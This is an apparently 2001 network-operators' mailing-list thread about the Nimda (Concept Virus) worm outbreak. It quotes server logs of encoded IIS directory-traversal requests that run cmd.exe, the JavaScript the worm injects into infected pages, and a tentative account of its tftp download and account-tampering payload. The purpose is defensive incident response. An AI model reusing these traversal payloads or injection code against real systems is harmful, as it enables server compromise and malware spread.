Has anyone else been seeing a dramatic increase in /scripts/.. NT worm
probes this morning? We're seeing about 8000/second, starting around 9:15
Eastern time, to and from a wide variety of addresses.
Is CodeRed or one of its relatives scheduled to start sweeping again today?
We've never seen this level of traffic related to the NT worms. Even
though we don't run any NT at all, we still have to suffer 
Kevin
On Tue, Sep 18, 2001 at 09:54:31AM -0400, sigma@pair.com said at one point in time:
Has anyone else been seeing a dramatic increase in /scripts/.. NT worm
probes this morning? We're seeing about 8000/second, starting around 9:15
Eastern time, to and from a wide variety of addresses.
affirmative. i just looked at my logs, and it looks like
each probe tries a bunch of things. i haven't seen much
on the lists, but i'm looking right now.
owned.site.com - - [18/Sep/2001:09:55:51 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 302 271 "-" "-"
owned.site.com - - [18/Sep/2001:09:55:51 -0400] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 302 271 "-" "-"
owned.site.com - - [18/Sep/2001:09:55:51 -0400] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 271 "-" "-"
owned.site.com - - [18/Sep/2001:09:55:51 -0400] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 271 "-" "-"
owned.site.com - - [18/Sep/2001:09:55:52 -0400] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 271 "-" "-"
owned.site.com - - [18/Sep/2001:09:55:52 -0400] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 271 "-" "-"
owned.site.com - - [18/Sep/2001:09:55:52 -0400] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 271 "-" "-"
owned.site.com - - [18/Sep/2001:09:55:52 -0400] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 271 "-" "-"
owned.site.com - - [18/Sep/2001:09:55:52 -0400] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 271 "-" "-"
owned.site.com - - [18/Sep/2001:09:55:52 -0400] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 271 "-" "-"
owned.site.com - - [18/Sep/2001:09:55:53 -0400] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 271 "-" "-"
owned.site.com - - [18/Sep/2001:09:55:53 -0400] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 271 "-" "-"
owned.site.com - - [18/Sep/2001:09:55:53 -0400] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 279 "-" "-"
owned.site.com - - [18/Sep/2001:09:55:53 -0400] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 279 "-" "-"
owned.site.com - - [18/Sep/2001:09:55:53 -0400] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 271 "-" "-"
owned.site.com - - [18/Sep/2001:09:55:53 -0400] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 271 "-" "-"
First ones appeared today, and so far I see 17650 attempts on just one of my servers. We don't run any Microsoft stuff either, but that doesn't keep our servers from getting hammered...
i'm pretty sure that the worm's attack phase starts on the 20th (which
of course, depends upon a correctly set system clock) and also that
attempting to execute something like /scripts/root.ext/c++ something
is involved.
i think that cert's website would be a good place to look. i'm *not*
a security/virus chick, but i did host a talk by marty linder of cert
where he discected code red's activity and presented a summary.
cert is of course, http://www.cert.org.
deeann m.m. mikula
director of operations
telerama public access internet
http://www.telerama.com
1.877.688.3200
ugh...this is way more impact...a 128k ISDN customer running an NT/Win2k
box is at 100% BW, and my 2x T1's are at about 2x normal traffic for this
time of day, although still well short of capacity...apache server
processor load is WAY up just from the requests, and the logs are growing
like mad.
We're also seeing a large increase in this activity. This seems to be more
severe than the first time. Have an additional 30 to 40 meg inbound from
this.
Best regards,
Bryan Heitman
CommuniTech.Net, Inc.
This seems to be the culprit:
Concept Virus(CV) V.5, Copyright(C)2001 R.P.China
I've nailed a copy, and am working on getting it to the right security
people. A *PRELIMINARY* (eyeballing the output of 'strings' indicates that
this one *both* sends itself via-email a la SirCam, *AND* scans for vulnerable
web servers, and if it finds a vulnerable server, it causes anybody visiting
that webpage to be offered a contaminated .exe as well.
I do *NOT* have a handle on what malicious effects it has other than just
propagating.
This one's nasty, folks...
indeed. scanning for strings that appear to be associated
with the Concept Virus(CV) V.5, there is a tremendous
increase in bandwidth usage. today alone i match:
/scripts: 18013
/_vti_bin: 1885
_mem_bin: 1916
/ms_adc/: 1945
/winnt/system32: 27648
bugtraq is starting to get in the preliminary reports
of this worm. beware that infected host's home pages
contain a javascript that sends you to a page that
attempts to send you a copy of the worm. fantastic, eh?
-r
On Tue, Sep 18, 2001 at 11:05:35AM -0400, up@3.am said at one point in time:
This is new - it modifies the web pages of the infected machine to
include a (I assume) virus. It adds this string to the web page:
<html><script language="JavaScript">window.open("readme.eml", null,
"resizable=no,top=6000,left=6000")</script></html>
Viewing infected web servers may be dangerous.
Mark Radabaugh
Amplex
(419) 833-3635
I'm sitting behind a dialup box right now, and I just added a log
clause to an ipf rule matching connection attempts to port 80.
I'm averaging 35 probes per minute. Blocking them is quite beneficial
to performance on a v.34 connection 
Joe
Appears that if it gets a 404 back from its intial unicode scans, it just keeps looking elsewhere. If the server responds with anything other than a 404 (such as a 403 IP Rejected, in this case...) It attempts to get the server to tftp a file named "admin.dll" from the scanning system.
I pulled the admin.dll from an infected box and to my non-programming eyes, it appears to do at least the following (in no order):
1. Adds the guest account to the local Administrators group and then activates the account
2. Use the anonymous
3. Makes sure c$ is shared
4. Tries to mail a bunch of files. HELO it uses is aabbcc. <*** Might be able to use this for a quick and dirty IDS Sig***>
5. Looks like admin.dll ends up in "c", "d" and "e".
6. creates a file named readme.exe which is actually a wav file (weird?)
I could be totally wrong here (and probably am) but oh well...
Chris
Concept Virus(CV) V.5, Copyright(C)2001 R.P.China
I've nailed a copy, and am working on getting it to the right security
people. A *PRELIMINARY* (eyeballing the output of 'strings' indicates that
this one *both* sends itself via-email a la SirCam, *AND* scans for vulnerable
web servers, and if it finds a vulnerable server, it causes anybody visiting
that webpage to be offered a contaminated .exe as well.
I do *NOT* have a handle on what malicious effects it has other than just
propagating.
I work at a large university and our security guys think this guy is what's
been causing us problems all morning. Lots of subnet scans (tons of
incomplete arps), CC Mail servers are wacking out, HPOV noting that
old 3Com gear is dropping etc. This is what I've heard through the rumor
mill (so take it with a grain of salt)...
"...At first blush, it spreads itself via by web, email, and maybe shares.
We've seen it spreading by a set of two HTTP requests. It will look for
backdoors left behind by Code Red, such as /scripts/root.exe. It uses tftp
to copy itself to the target machine then launches it via a second HTTP
command."
Eric 
Follow up...
The web page on infected servers includes a script to send and open the
file 'readme.exe' on windows machines. I do not know the details of
when the executable does yet.
Mark
Yes, I saw...
I just contact our local NIC security guys and they told me that there are
two new worms. One is exploiting the backdoors left by codered 2, and
another worm is (possible) a "codered 3", which is defacing the web pages
with anti-chinese and anti-poisonbox messages...
Today is the day... :-((((
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
I just received this update from Sophos. Perhaps this is the virus that
is spreading?
=== Tim
I just got an e-mail with
It had readme.exe attached to it. Obviously one should not
open this.
Time to create a new .procmail rule.
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1I just received this update from Sophos. Perhaps this is the virus that
is spreading?
-- snip --
I protected against readme.exe specifically several weeks ago. I also
proactively filter all incoming emails for executable attachments.
[Begin sample]
Regarding your message to
x msgid=<x@x.x.net>
You are receiving this message due to the fact a possible email attack was
detected passing through our mail servers
from you. This was probally due to a file attachment. As many of these
attachements can run on their own we only allow harmless file types to be
sent. If you wish to send this file anyway please use a compression program.
If you have further questions please do not hesitate to give me a call at
the number below.
Bill Larson blarson@compu.net
Network Administrator
[Phone numbers here]
REPORT: Trapped poisoned executable "readme.exe"
REPORT: Not a document, or already poisoned by filename. Not scanned for
macros.
STATUS: Message quarantined, not delivered to recipient.
Folks,
If anyone has a packet capture of the infection in progress, would you please contact me. I would like to get it to the some of the Cisco IOS folks ASAP. (Not my official job, but would like to help.)
Thanks!!
Michael Airhart
Has anyone else been seeing a dramatic increase in /scripts/.. NT worm
probes this morning? We're seeing about 8000/second, starting around 9:15
Yes. We are seeing it here bigtime. Does anyone have any apache hacks
to lessen the impact? One idea: Once a probe is sent, the prober's
IP# is stored in a hash (perhaps in shared memory or a mmap'd file
that all children can share) and new connections from that IP are no
longer accepted.
thanks,
-joe
It is worse than that. The virus is passing it's self off as audio/x-wav;